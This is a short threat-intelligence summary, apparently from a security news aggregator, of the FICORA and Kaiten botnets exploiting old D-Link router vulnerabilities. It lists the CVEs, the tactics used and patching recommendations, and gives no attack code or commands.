Press ESC to close

FICORA and Kaiten Botnets Exploit Old D-Link Vulnerabilities for Global Attacks

Category Details
Threat Actors Botnet operators using Mirai variant (FICORA) and Kaiten variant (CAPSAICIN).
Campaign Overview Surge in botnet attacks leveraging D-Link router vulnerabilities; FICORA targeting globally, CAPSAICIN focusing on East Asia (Japan, Taiwan). CAPSAICIN particularly active on Oct 21–22, 2024.
Target Regions FICORA: Global; CAPSAICIN: East Asia (Japan, Taiwan).
Methodology Exploits vulnerabilities in D-Link routers (via HNAP interface), brute-force credential attacks, downloader scripts, and C2 communication for executing commands.
Products Targeted D-Link routers, Linux-based systems.
Malware Reference FICORA (Mirai variant) and CAPSAICIN (Kaiten variant).
Tools Used Commands like wget, ftpget, curl, tftp for downloading payloads; brute-force attack functions; malicious scripts (“multi” and “bins.sh”).
Vulnerabilities Exploited HNAP weaknesses in D-Link routers (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, CVE-2024-33112).
TTPs Exploiting unpatched vulnerabilities, brute-force login attempts, killing rival botnet processes, leveraging DDoS techniques (UDP, TCP, DNS), maintaining persistence, and interaction via C2 servers.
Attribution Botnet campaigns targeting vulnerable D-Link routers and leveraging decade-old vulnerabilities.
Recommendations Regularly update router firmware and kernels, patch known vulnerabilities, use comprehensive monitoring, and implement strict access controls.
Source The Hackers News

Read full article: https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html

The above summary has been generated by an AI language model

Stay Updated with Our Newsletter

Source: TheHackersNews

Published on: December 27, 2024

Leave a Reply

Your email address will not be published. Required fields are marked *